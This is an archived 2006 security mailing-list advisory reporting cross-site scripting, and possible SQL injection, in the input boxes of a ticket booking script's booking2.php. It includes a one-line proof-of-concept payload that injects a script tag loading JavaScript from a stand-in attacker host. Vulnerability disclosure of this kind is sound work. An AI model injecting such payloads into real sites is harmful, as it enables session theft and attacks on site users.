|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
mole.com.ua Ticket Booking Script - XSS
luny
youfucktard.com
Date: Fri Jun 09 2006 - 00:04:04 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Ticket Booking Script
Homepage:
http://www.mole.com.ua
Effected files:
input boxes on booking2.php
XSS Vulnerabilities:
The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible SQL injections.
For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]